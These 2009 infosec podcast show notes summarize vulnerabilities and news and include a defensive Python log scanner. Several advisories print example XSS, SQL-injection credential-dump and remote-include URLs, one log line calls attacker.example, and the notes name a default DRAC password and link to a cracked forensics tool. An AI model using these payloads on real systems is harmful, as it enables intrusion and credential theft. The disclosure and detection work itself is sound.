InfoSec Podcast Episode 36 for December 29, 2009. This podcast is our contribution back to the community, where we discuss vulnerabilities of interest and information-security related news, hopefully providing you a few laughs and a little knowledge.
Webspeedway specializes in providing proactive solutions to mitigate the risks of downtime, data loss, e-mail viruses and the many other threats to your business systems. Webspeedway provides the services of a Fortune 500 IT department, including 24 x 7 monitoring and on-site support, all at a fraction of the cost of even one employee.
Go to www.webspeedway.com today to learn about their cost-effective IT management solutions for your business.
Community SANS Atlanta 2010 Spring Schedule has been posted.
SEC-606: Drive and Data Recovery Forensics 2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth 2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems 3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression 4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth 5/17/10 to 5/21/10
Register online at http://www.sans.org or call (301) 654-SANS (7267).
Vulnerabilities of Interest:
- APC Switched Rack Power Distribution Units (PDU) are subject to a cross-site scripting vulnerability because the device's web interface fails to properly sanitize user-supplied input. This may be leveraged to execute script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. APC Switched Rack PDU AP7932 is vulnerable; other versions may also be affected. Attackers can exploit this issue by enticing an unsuspecting user to follow a malicious URI. An example URL is available: http://www.example.com/Forms/login1?login_username=<ScRiPt>alert('hello');</ScRiPt>
- The Kleinanzeigenmarkt plugin for Woltlab Burning Board is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could result in a compromise of the application, accessing or modifying data, or exploiting the underlying database. All it takes is a browser to exploit this issue. Exploit code is available in the wild.
- Pragyan CMS is subject to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. This could result in compromising the application as well as potentially the complete system. Pragyan CMS 2.6.4 is vulnerable; other versions may also be affected. Exploiting these issues is as simple as using a browser and the example URLs: http://www.example.com/cms/modules/search/search.php?moduleFolder=[Evil] and http://www.example.com/cms/modules/search/search.php?sourceFolder=[Evil].
- Jax Guestbook is subject to an authentication-bypass vulnerability which could allow an attacker to gain administrative access to the affected script and/or make configuration changes. This could potentially lead to further attacks. Jax Guestbook 3.50 is vulnerable; other versions may also be affected. Exploiting this issue is as simple as using a browser and the example URL: http://www.example.com/admin/guestbook/admin/guestbook.admin.php?action=settings&guestbook_id=0&language=english&gmt_ofs=0
- MyBB is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input, which may be leveraged to execute script code in the browser of a user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and to launch additional attacks. MyBB 1.4.10 is vulnerable; other versions may be affected as well. Exploiting this issue requires enticing a user to follow a malicious URL. Example URLs are available: http://www.example.com/myps.php?action=donate&username="/> and http://www.example.com/myps.php?action=donate&username=<IMG""">">
- The Automated Logout module for Drupal is subject to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. This may be leveraged to execute script code in the browser of a user in the context of the affected site. Automated Logout 6.x-1.6, 6.x-2.2 and prior versions are vulnerable.
- Wireshark is subject to multiple denial-of-service vulnerabilities and a buffer-overflow vulnerability which may allow an attacker to crash the application and deny service to legitimate users. Additionally, there is the possibility that these vulnerabilities could result in the execution of code in the context of users running the application. These issues affect Wireshark 0.9.0 through 1.2.4. Proof-of-concept capture files for the denial-of-service issues are available from the following locations: https://bugs.wireshark.org/bugzilla/attachment.cgi?id=4055 and http://www.wireshark.org/download/automated/captures/fuzz-2009-12-07-11141.pcap.
- The 'com_schools' component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application and to access or modify data in the underlying database. An example URL is available: http://www.example.com/path/index.php?option=com_schools&Itemid=89&schoolid=-53+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users–
- Microsoft IIS is prone to a security-bypass vulnerability that may result in IIS interpreting unexpected files as CGI applications. Attackers may be able to exploit this vulnerability to bypass intended security restrictions. Reports indicate that IIS 7.5 is not vulnerable to this issue; furthermore, it is currently unknown if IIS 7.0 is vulnerable.
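As an added defender-side example (not code from the podcast or from any of the advisories it summarizes), the following Python scans constructed web-server access-log lines for the three payload shapes quoted in the items above: a script tag in a query parameter, UNION SELECT appended to a numeric parameter, and a remote URL in the Pragyan CMS include parameters. The rule names, the log lines and the attacker.example host are assumptions made here.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Rules mirror the payload shapes in this episode's example URLs; the names are
# constructed here, not any scanner's signature IDs.
RULES = {
    "xss_script_tag": re.compile(r"<\s*script", re.IGNORECASE),
    "sqli_union_select": re.compile(r"\bunion\b.{0,20}\bselect\b", re.IGNORECASE),
    "rfi_remote_include": re.compile(r"(moduleFolder|sourceFolder)=(https?|ftp)://", re.IGNORECASE),
}

# Apache/nginx combined log format: client, identity, user, timestamp, request, status ...
LOG_RX = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def decode_query(url: str) -> str:
    """Query string of a logged request, percent-decoded twice so that
    single- and double-encoded payloads match the same rule."""
    return unquote_plus(unquote_plus(urlsplit(url).query))

def classify(url: str) -> list:
    """Names of the rules whose pattern appears in the decoded query string."""
    query = decode_query(url)
    return [name for name, rx in RULES.items() if rx.search(query)]

def scan_log(lines) -> list:
    """(client_ip, status, rule names) for each log line whose request matches a rule."""
    findings = []
    for line in lines:
        m = LOG_RX.match(line)
        if not m:  # skip malformed lines and methods other than GET/POST
            continue
        ip, url, status = m.groups()
        hits = classify(url)
        if hits:
            findings.append((ip, status, hits))
    return findings

# Constructed sample log lines modelled on the example URLs quoted above.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Dec/2009:10:15:32 -0500] "GET /Forms/login1?login_username=%3CScRiPt%3Ealert(%27hello%27)%3C/ScRiPt%3E HTTP/1.1" 200 512',
    '203.0.113.6 - - [29/Dec/2009:10:16:01 -0500] "GET /index.php?option=com_schools&Itemid=89&schoolid=-53+union+select+1,2,3 HTTP/1.1" 200 2048',
    '203.0.113.7 - - [29/Dec/2009:10:16:40 -0500] "GET /cms/modules/search/search.php?moduleFolder=http://attacker.example/x HTTP/1.1" 500 300',
    '198.51.100.9 - - [29/Dec/2009:10:17:05 -0500] "GET /index.php?option=com_schools&Itemid=89&schoolid=53 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, status, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} rules={','.join(hits)}")
```

The double decode matters because a single pass would leave `%253Cscript%253E` looking like harmless text; the benign fourth line produces no finding.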
Amazon.com on Saturday released its annual post-Christmas statement on holiday sales and made one thing clear: the Kindle was king. Amazon.com 2009 Holiday Facts (www.amazon.com only):
- Amazon customers purchased enough fruit cake to equal the weight of a 1967 Volkswagen Bug.
- Amazon customers bought enough gingerbread house kits that if stacked on top of each other would be as tall as the Sears Tower.
- If all the computers customers purchased this holiday were stacked one on top of the other, they would be more than twice as high as Mt. Everest.
- Amazon customers bought over 50 times more Light Therapy devices this holiday season than there are sunny days in Seattle the entire year.
- For the holiday time period alone, Amazon customers purchased enough shoot-and-share camcorders to supply 50 years’ worth of non-stop YouTube watching.
- Amazon customers bought enough Levi’s jeans to clothe everyone at the opening ceremony of the 2010 Olympics in Vancouver.
- Amazon customers purchased so many Blu-ray disc players that if you lined them up side to side, they would stretch for more than 27 miles.
- During the 2009 holiday season, Amazon customers bought enough 8 GB iPod touches to play 442 years of continuous music.
- In 2009, Amazon customers purchased enough heart rate monitor watches to put one on the wrist of everyone who finished the New York City marathons in 2008 and 2009.
- Amazon customers purchased enough Frustration-Free Package items to eliminate over 32,000 pounds of frustrating plastic materials, such as plastic clamshells.
- The last One-Day Prime order that was delivered in time for Christmas was placed on Dec. 23 at 9:17 p.m. Pacific and shipped to Boca Raton, Florida for delivery on Dec. 24. The item was a pair of Yellow Gold 8-8.5mm Freshwater Cultured Pearl Stud Earrings.
- The last Local Express Delivery order that was delivered in time for Christmas was placed by a Prime member and went to Seattle. It was a Kindle that was ordered at 1:43 p.m. on Christmas Eve and delivered at 4:57 p.m. that evening.
Amazon.com’s Hot Holiday Bestsellers (Nov. 15 through Dec. 19, based on units ordered):
- Electronics: Kindle Wireless Reading Device; Apple iPod touch 8 GB; and Garmin nuvi 260W 4.3-inch GPS
- Toys: Scrabble Slam Cards; The Settlers of Catan; and Scene It? Twilight Deluxe Edition
- Video Games and Hardware: Wii Fit Plus with Balance Board; New Super Mario Bros; and Call of Duty: Modern Warfare 2
News item 2: http://seclists.org/fulldisclosure/2009/Dec/438
As discussed last week, it appears that DECAF was disabled by the authors at decafme.org. Well, it looks like some people over at soldierx.com have patched the binary to re-enable it and remove the phone-home functionality. The files are at http://thepiratebay.org/torrent/5238072/DECAF-SOLDIERX.rar or http://www.multiupload.com/88TEOEYCSZ. Of the sites listed on the multiupload.com site, I had problems with both RapidShare and MegaUpload. The other sites seemed to work well.
News item 3: http://ontheflix.com/2009/12/25/celtics-ray-allen-twitter-account-gets-hacked-sends-naughty-tweets/
It seems that Celtics shooting guard Ray Allen's Twitter account was hacked and apparently was sending some pretty naughty tweets. The Huffington Post is reporting tweets such as: "I'm getting there. When you masturbate think about my tongue or your cl*t and switching back and forth from my d**k to my tongue."
The tweets got deleted later on, and 14 minutes later another tweet showed up stating an apology and claiming he was not responsible. It read like this: "I'm sorry my acct was hacked into. I need to changey tweet handle." Then he changed his Twitter name from @sugarray20 to @greenrayn20. Ray Allen said he may have to get off Twitter if this continues to happen. He tweeted, "i hope that it was amusing to people but im either gonna change my password or stop tweeting altogether."
News item 4: http://www.wired.com/dangerroom/2009/12/not-just-drones-militants-can-snoop-on-most-us-warplanes/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+wired%2Fpolitics+%28Wired%3A+Politics%29
Wired Magazine is reporting that militants tapping into drones’ video feeds was just the start. Apparently, the U.S. military’s system for bringing overhead surveillance down to soldiers and Marines on the ground is also vulnerable to electronic interception. That means militants have the ability to see the video feeds from traditional fighters and bombers to unmanned spy planes. The problem is in the process of being addressed. But for now, an enormous security breach is even larger than previously thought.
So what is to blame? Apparently, the feeling is that early on units were "fielded so fast that it was done with an unencrypted signal. It could be both intercepted (e.g. hacked into) and jammed". The question is why it is taking 10 years to fix the issue. You've got satellite providers in the L, C, S and Ku [satellite] bands that are sending data encrypted, so it's not like this is new technology. What's the big deal? Well, imagine trying to ensure that all units in a theater have the correct encryption/decryption keys necessary to receive the data they need. This is really where the issue is. Do you trust the small units with these keys? How do you handle key rotation?
News item 5: http://blog.tenablesecurity.com/2009/12/top-10-nessus-plugins-for-2009.html
In 2009, Tenable released over 8,100 new plugins (and the year isn't over yet!). These plugins have covered several different types of vulnerabilities, including web applications, embedded systems, local checks for operating systems and much more. Tenable polled its employees to find some of their favorite plugins released this year, and compiled the following list:
- DD-WRT HTTP Daemon Metacharacter Injection Remote Code Execution – This vulnerability allows remote attackers to inject commands via a flaw in the HTTP management web application on embedded systems running DD-WRT.
- Windows Remote Registry Enable/Disable – For remote authenticated checks to run on Windows systems, the remote registry service needs to be enabled. While this may not be a service you wish to run on all your systems, this plugin solves that problem by temporarily enabling and then disabling the remote registry service when the scan has completed.
- PCI Test Requirements – Back in April of 2009, I wrote a blog post titled "PCI DSS Auditing Linux, Apache, PHP & MySQL with Nessus 4".
- USB Drives Enumeration – In 2009, over 218 million records fell into the wrong hands due to some form of breach (According to a report generated by DataLossDB). Some of those data loss incidents can be attributed to removable media such as USB thumb drives.
- Malware Infected Host - This Nessus plugin will seek out and report on these types of HTTP servers.
- Dell Remote Access Controller Default Password (calvin) for ‘root’ Account
- Conficker Detection (uncredentialed check) – Conficker was one of the major malware releases in 2009. This Nessus plugin could detect it on remote systems without using credentials.
- Backported Security Patches (HTTP) – This plugin looks at Linux distribution banners for common FTP, HTTP and SSH services that seem as if they have not been patched, but are in fact most likely to have been fixed.
- Microsoft Windows SMB Shares Access – This plugin that keeps on giving! A simple plugin, but one of the most likely to fire during an internal audit where Windows machines are found. The shared drives could contain nothing or they could contain the entire HR database.
- Enhanced Web Application Testing Plugins – Not a plugin per se, but a bunch of enhanced web app tests with new options that didn't exist before '09.
News item 6: http://www.wafb.com/Global/story.asp?S=11661499
A story about a 21-year-old being caught on camera is probably nothing new. Stealing a decoy camera is probably a little odd. Having a landowner set up decoy cameras to capture the theft of his digital game surveillance cameras is even more odd. Believe it or not, Dustin Archibald of Denham Springs was caught on camera stealing a camera with a "No Trespassing" sign visible in the background.
Archibald claims that he was not stealing the camera, but rather taking it so the landowner would not be able to hunt deer in the area. Unfortunately for him, with the property owner's photographic evidence from his surveillance cameras, Archibald was identified right away and he consequently turned himself in to authorities.
The take-away here is that you never know what is watching a device that watches.